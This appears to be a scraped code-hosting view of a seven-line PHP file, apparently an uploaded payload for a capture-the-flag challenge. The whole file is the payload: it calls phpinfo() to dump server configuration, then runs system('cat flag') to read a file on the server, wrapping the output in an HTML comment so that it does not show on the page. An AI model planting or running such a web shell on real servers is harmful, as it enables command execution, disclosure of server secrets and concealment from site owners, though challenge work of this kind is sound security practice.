7 lines
66 B
PHP
7 lines
66 B
PHP
<?php
|
|
phpinfo();
|
|
echo "<!--";
|
|
system("cat flag");
|
|
echo "-->";
|
|
?>
|